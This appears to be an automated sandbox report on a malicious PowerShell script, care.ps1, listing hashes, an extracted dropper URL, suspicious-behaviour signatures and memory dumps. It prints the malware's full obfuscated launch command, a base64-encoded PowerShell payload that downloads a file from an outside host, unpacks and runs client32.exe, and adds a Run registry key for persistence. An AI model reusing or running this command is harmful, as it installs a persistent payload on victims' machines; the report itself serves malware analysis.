aedbd62259bd95c855b9364b1c7a56f303909b0e32269b2ca042e7c75e9e5e45

General

Target

care.ps1
Size

2KB
MD5

f240b3caaa90e4fa111e8e566cf913e2
SHA1

aa12a29a39e7d2684ad4d4383074aeed0ef4a29f
SHA256

aedbd62259bd95c855b9364b1c7a56f303909b0e32269b2ca042e7c75e9e5e45
SHA512

183f7387db097662c800aada8c46a529a5d0d7ef4f9114e716622e932375baaa9b98eeba700abfd0ac647333754ada6ca257a41c35c4853509eb898d904fe928

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://whatisfurosemide.com/f877c2e5-2949-4498-af83-6a5c5jd37342a.txt

Signatures

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1724	powershell.exe
2584	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1724 wrote to memory of 2584	1724	powershell.exe	29
PID 1724 wrote to memory of 2584	1724	powershell.exe	29
PID 1724 wrote to memory of 2584	1724	powershell.exe	29

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\care.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopROF -exeCu byPasS -WiNDows hI -E QwBoAGQAaQByACAAJABFAG4AdgA6AEwAbwBDAEEAbABhAHAAcABkAEEAVABhADsAIAAkAGsAbQAxAGgAVABRAEIARwA9AFsAYgB5AHQAZQBbAF0AXQBAACgAOAAwACwAIAA3ADUALAAgADMALAAgADQAKQA7ACAAJABIADQAYgB1AEwAVAA9ACcAaAB0AHQAcAA6AC8ALwB3AGgAYQB0AGkAcwBmAHUAcgBvAHMAZQBtAGkAZABlAC4AYwBvAG0ALwBmADgANwA3AGMAMgBlADUALQAyADkANAA5AC0ANAA0ADkAOAAtAGEAZgA4ADMALQA2AGEANQBjADUAagBkADMANwAzADQAMgBhAC4AdAB4AHQAJwA7ACAAJABhADQARABuAEYAWgB2ADAAPQAnAEMAaQBRAFYAOQBOAC4AegBpAHAAJwA7ACAAJAB1AGIAYgB2AEoAPQAnAFMAdABhAGIAbABlACAAZgBvAGwAZABlAHIAIABtAGEAbgBhAGcAZQByACAAKABtAGEAcgAuADAANAApACcAOwAgACQAawBIAFIAbgBDAGoAPQBpAG4AVgBPAEsAZQAtAFcARQBCAHIARQBxAHUARQBzAFQAIAAtAHUAcgBpACAAJABIADQAYgB1AEwAVAAgAC0AVQBTAGUAYgBBAFMAaQBjAHAAYQBSAFMASQBOAEcAOwAgACQAOQBDAHkAQQBlADQAVQBDAD0AJABrAEgAUgBuAEMAagAuAEMAbwBOAFQARQBOAFQAOwAgACQAZQB4AHMAOABaAFQAPQAkAEUAbgB2ADoATABvAEMAQQBsAGEAcABwAGQAQQBUAGEALAAgACQAdQBiAGIAdgBKACAALQBqAE8AaQBuACAAJwBcACcAOwAgACQAYwAwAEoAQwBvAGIAQwA9AEoATwBJAE4ALQBwAEEAVABIACAALQBQAGEAVABIACAAJABFAG4AdgA6AEwAbwBDAEEAbABhAHAAcABkAEEAVABhACAALQBDAEgAaQBMAGQAcABhAFQAaAAgACQAYQA0AEQAbgBGAFoAdgAwADsAIAAkAGcASABVAEYAdQA9AFsAQwBvAG4AdgBFAHIAVABdADoAOgBGAFIAbwBNAGIAQQBzAGUANgA0AHMAVABSAEkAbgBnACgAJAA5AEMAeQBBAGUANABVAEMAKQA7ACAAJABEAFgARgBpAFUAPQAkAGcASABVAEYAdQAgAC0AUwBwAGwASQB0ACAAJwAgACcAIAAtAGEAcwAgAFsAQgB5AHQAZQBbAF0AXQA7ACAAJABCAHMAQwBtAHcARABwAD0AJABrAG0AMQBoAFQAUQBCAEcAKwAkAEQAWABGAGkAVQA7ACAAcwBFAHQALQBDAG8AbgBUAGUATgBUACAAJABhADQARABuAEYAWgB2ADAAIAAkAEIAcwBDAG0AdwBEAHAAIAAtAEUATgBDAE8AZABJAE4ARwAgAEIAWQBUAEUAOwAgAEUAWABQAEEATgBEAC0AQQByAGMAaABJAFYAZQAgAC0AUABhAHQAaAAgACQAYwAwAEoAQwBvAGIAQwAgAC0ARABlAFMAdABpAG4AQQBUAGkATwBuAHAAYQBUAEgAIAAkAGUAeABzADgAWgBUACAALQBmAE8AcgBDAEUAOwAgAHIAZQBtAG8AdgBlAC0ASQBUAEUAbQAgACQAYQA0AEQAbgBGAFoAdgAwADsAIABDAEQAIAAkAGUAeABzADgAWgBUADsAIAAkAFcAaQBFAEUAYQB3AD0AIgAkAGUAeABzADgAWgBUAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAAcwB0AGEAcgB0ACAAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAOwAgAG4AZQB3AC0ASQBUAEUAbQBQAHIAbwBwAGUAUgB0AHkAIAAtAHAAQQB0AEgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAEUAIAAkAHUAYgBiAHYASgAgAC0AdgBBAGwAdQBFACAAJABXAGkARQBFAGEAdwAgAC0AUAByAE8AUABFAHIAVABZAFQAWQBQAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2584

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f83dacc2a8148c2ab3ad1c349bb00961

SHA1
1eeecdff380cf2d9a4d6dfbaa0307c19de896f10

SHA256
61cfdb5837565866736cd462dd6370ba7fbd01018a606195553d5c8d2ac0b866

SHA512
994c537ad2c4a227ed319a43fa75e292724d52d7fbc7d992f606652024337f3f417506f28265723507039f424c74d27de40fa208a9c188d10822c40a433f8539

Download Submit
memory/1724-7-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/1724-15-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/1724-4-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/1724-8-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/1724-9-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/1724-6-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/1724-16-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/1724-5-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/1724-21-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-20-0x0000000002B90000-0x0000000002C10000-memory.dmp

Filesize
512KB

Download
memory/2584-19-0x0000000002B90000-0x0000000002C10000-memory.dmp

Filesize
512KB

Download
memory/2584-18-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-17-0x0000000002B90000-0x0000000002C10000-memory.dmp

Filesize
512KB

Download
memory/2584-22-0x0000000002B90000-0x0000000002C10000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing